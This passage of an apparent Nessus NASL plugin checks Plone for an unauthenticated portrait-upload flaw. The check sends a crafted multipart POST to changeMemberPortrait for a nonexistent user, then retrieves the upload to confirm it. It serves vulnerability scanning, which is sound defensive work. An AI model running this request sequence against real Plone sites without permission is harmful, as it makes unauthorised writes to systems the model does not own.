script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/04/14\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\nurl = dir + \"/portal_membership/changeMemberPortrait\";\nr = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\nres = r[2];\n\n# If so...\nif (\n '<meta name=\"generator\" content=\"Plone' >< res &&\n \"The parameter, <em>portrait</em>, was omitted from the request\" >< res\n)\n{\n # Upload a profile for a nonexistent user.\n user = string(SCRIPT_NAME, \"-\", unixtime());\n portrait = rand_str();\n\n bound = \"nessus\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\",\n 'Content-Disposition: form-data; name=\"portrait\"; filename=\"', user, '.gif\"', \"\\r\\n\",\n \"Content-Type: image/gif\\r\\n\",\n \"\\r\\n\",\n portrait, \"\\r\\n\",\n\n boundary, \"\\r\\n\",\n 'Content-Disposition: form-data; name=\"member_id\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n http_send_recv3(\n method : \"POST\",\n item : url,\n port : port,\n content_type : \"multipart/form-data; boundary=\" + bound,\n data : postdata,\n exit_on_fail : TRUE\n );\n\n # Retrieve the newly-created portrait.\n r = http_send_recv3(\n method : \"GET\",\n item : dir + \"/portal_memberdata/portraits/\" + user,\n port : port,\n exit_on_fail : TRUE\n );\n res = r[2];\n\n # There's a problem if we get our portrait content back.\n if (portrait == res) security_warning(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}
